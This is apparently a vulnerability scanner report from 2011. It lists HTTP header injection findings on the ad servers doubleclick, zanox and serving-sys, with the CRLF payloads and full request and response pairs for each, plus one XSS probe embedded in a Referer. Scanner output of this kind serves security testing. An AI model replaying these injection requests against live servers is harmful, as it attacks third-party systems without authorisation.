GET /1032c%0d%0a72456777471/N815.zdenterprise/B4597436.59;sz=1x1;ord=1288981822554? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1032c 72456777471/N815.zdenterprise/B4597436.59%3Bsz%3D1x1%3Bord%3D1288981822554: Date: Sun, 06 Feb 2011 13:22:40 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 8b0ee%0d%0a76dcc98cc56 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8b0ee%0d%0a76dcc98cc56/N815.zdenterprise/B4822628.25;sz=1x1;ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8b0ee 76dcc98cc56/N815.zdenterprise/B4822628.25%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D: Date: Sun, 06 Feb 2011 13:22:39 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5dc39%0d%0a0f8fde46ef2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5dc39%0d%0a0f8fde46ef2/N815.zdenterprise/B5069510.14;sz=1x1;ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5dc39 0f8fde46ef2/N815.zdenterprise/B5069510.14%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D: Date: Sun, 06 Feb 2011 13:22:41 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 5ecae%0d%0aaf16c007475 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5ecae%0d%0aaf16c007475/N815.zdenterprise/B5069510.30;sz=1x1;ord=%n? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/5ecae af16c007475/N815.zdenterprise/B5069510.30%3Bsz%3D1x1%3Bord%3D%25n: Date: Sun, 06 Feb 2011 13:22:38 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2f022%0d%0a00140ddecd3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2f022%0d%0a00140ddecd3/N815.zdenterprise/B5069510.9;sz=1x1;ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2f022 00140ddecd3/N815.zdenterprise/B5069510.9%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D: Date: Sun, 06 Feb 2011 13:22:38 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 36cf6%0d%0a6a7c8a5efd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /36cf6%0d%0a6a7c8a5efd6/entzd.eweek/ibmtutorial;sz=1x1;ord=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/36cf6 6a7c8a5efd6/entzd.eweek/ibmtutorial%3Bsz%3D1x1%3Bord%3D1: Date: Sun, 06 Feb 2011 13:22:39 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 17ca4%0d%0a41f12a81071 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /17ca4%0d%0a41f12a81071/entzd.eweek/ibmwidget/cloudimu;sz=1x1;ord=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/17ca4 41f12a81071/entzd.eweek/ibmwidget/cloudimu%3Bsz%3D1x1%3Bord%3D1: Date: Sun, 06 Feb 2011 13:22:41 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 22974%0d%0a6a1f47d2342 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /22974%0d%0a6a1f47d2342/entzd.eweek/ibmwidget/virtimu;sz=1x1;ord=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/22974 6a1f47d2342/entzd.eweek/ibmwidget/virtimu%3Bsz%3D1x1%3Bord%3D1: Date: Sun, 06 Feb 2011 13:22:40 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 14c2c%0d%0ab2351d233db was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /14c2c%0d%0ab2351d233db/N553.158901.DATAXU/B4970757.11;sz=468x60;pc=[TPAS_ID];ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/14c2c b2351d233db/N553.158901.DATAXU/B4970757.11%3Bsz%3D468x60%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D%5Btimestamp%5D: Date: Sat, 05 Feb 2011 21:49:07 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 42c36%0d%0abbd914c4d3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /42c36%0d%0abbd914c4d3b/N553.158901.DATAXU/B4970757.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/42c36 bbd914c4d3b/N553.158901.DATAXU/B4970757.11: Date: Sat, 05 Feb 2011 21:50:28 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 75aa0%0d%0a89c0f58a50b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /75aa0%0d%0a89c0f58a50b/entzd.base/itmanagement HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/75aa0 89c0f58a50b/entzd.base/itmanagement: Date: Sun, 06 Feb 2011 17:17:44 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 80fc5%0d%0a18367c4310e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /80fc5%0d%0a18367c4310e/oiq.man.homeappliance/;mfg=145;tile=1;sz=720x90,728x90;ord=1296942753;u=mfg_145%7Csid_ HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/80fc5 18367c4310e/oiq.man.homeappliance/%3Bmfg%3D145%3Btile%3D1%3Bsz%3D720x90%2C728x90%3Bord%3D1296942753%3Bu%3Dmfg_145%7Csid_: Date: Sat, 05 Feb 2011 22:27:55 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 56f15%0d%0a1b7eaef4d04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /56f15%0d%0a1b7eaef4d04/N553.158901.DATAXU/B4970757.11 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/56f15 1b7eaef4d04/N553.158901.DATAXU/B4970757.11: Date: Sat, 05 Feb 2011 21:50:29 GMT Server: GFE/2.0 Connection: close
The value of the 14786739C435671106&ULP request parameter is copied into the Location response header. The payload d2ed0%0d%0acf60b7507b4 was submitted in the 14786739C435671106&ULP parameter. This caused a response containing an injected HTTP header.
Request
GET /tpv/?14786739C435671106&ULP=d2ed0%0d%0acf60b7507b4&zpar0=125_1_728x90_360_pvc_ad4matdedault HTTP/1.1 Host: ad.zanox.com Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:39:07 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C114178S1469386944579519491T0I14786739C0T0; domain=.zanox.com; path=/ Set-Cookie: zptpvc=5C114178S1469386944579519491T0I14786739C0T0; expires=Sat, 07-May-2011 17:39:07 GMT; domain=.zanox.com; path=/ Content-Length: 0 Location: http://www.bild.ded2ed0 cf60b7507b4&zpar0=125_1_728x90_360_pvc_ad4matdedault?zanpid=14786739C435671106T1469386944579519491 pragma: no-cache cache-control: no-store
3.17. http://ad.zanox.com/tpv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.zanox.com
Path:
/tpv/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 96c36%0d%0a1e76b109467 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /tpv/?14786739C435671106&ULP=http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&96c36%0d%0a1e76b109467=1 HTTP/1.1 Host: ad.zanox.com Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:40:04 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C322704S1469387185567450118T0I14786739C0T0; domain=.zanox.com; path=/ Set-Cookie: zptpvc=5C322704S1469387185567450118T0I14786739C0T0; expires=Sat, 07-May-2011 17:40:04 GMT; domain=.zanox.com; path=/ Content-Length: 0 Location: http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&96c36 1e76b109467=1&zanpid=14786739C435671106T1469387185567450118 pragma: no-cache cache-control: no-store
The value of the zpar0 request parameter is copied into the Location response header. The payload 8b1c7%0d%0aa5975a40bc was submitted in the zpar0 parameter. This caused a response containing an injected HTTP header.
Request
GET /tpv/?14786739C435671106&ULP=http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=8b1c7%0d%0aa5975a40bc HTTP/1.1 Host: ad.zanox.com Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:39:12 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C127423S1469386967060988934T0I14786739C0T0; domain=.zanox.com; path=/ Set-Cookie: zptpvc=5C127423S1469386967060988934T0I14786739C0T0; expires=Sat, 07-May-2011 17:39:12 GMT; domain=.zanox.com; path=/ Content-Length: 0 Location: http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=8b1c7 a5975a40bc&zanpid=14786739C435671106T1469386967060988934 pragma: no-cache cache-control: no-store
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 803fb%0d%0a71e6bfcf0d1 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerRedirect.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0803fb%0d%0a71e6bfcf0d1; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0803fb 71e6bfcf0d1; expires=Sat, 07-May-2011 12: 18:54 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz01g; expires=Sat, 07-May-2011 12:18:54 GMT; domain=.serving-sys.com; path=/ P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 06 Feb 2011 17:18:54 GMT Connection: close
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 3b588%0d%0ae9f2ac9bef5 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=03b588%0d%0ae9f2ac9bef5; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;
The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload c3e38%0d%0aea51dd9334e was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4363488~~0~~~^ebAdDuration~10~0~01020^ebAboveTheFoldDuration~9~0~01020^ebAboveTheFold~0~0~01020|4443510~~0~~~^ebAdDuration~1~0~01020^ebAboveTheFoldDuration~1~0~01020^ebAboveTheFold~0~0~01020&OptOut=0&ebRandom=0.8359781634062529&flv=10.1103&wmpv=0&res=128&bwVal=c3e38%0d%0aea51dd9334e&bwTime=1296998548216 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Origin: http://www.baselinemag.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload b9a93%0d%0afca8ffe0901 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117121&PluID=0&e=0&w=728&h=90&ord=7582024&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/3/0/%2a/m%3B235470018%3B0-0%3B0%3B23542470%3B3454-728/90%3B40150909/40168696/1%3Bu%3Dzdtopic%3Ditmanagement|zdtopic%3Denterprise|zdtopic%3Dintelligence|zdid%3Da6280|zdtype%3Darticle|zdaudience%3D|zdproduct%3D|zdcompany%3D|zdpagetype%3D%3B%7Eaopt%3D2/0/73/0%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0b9a93%0d%0afca8ffe0901; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; 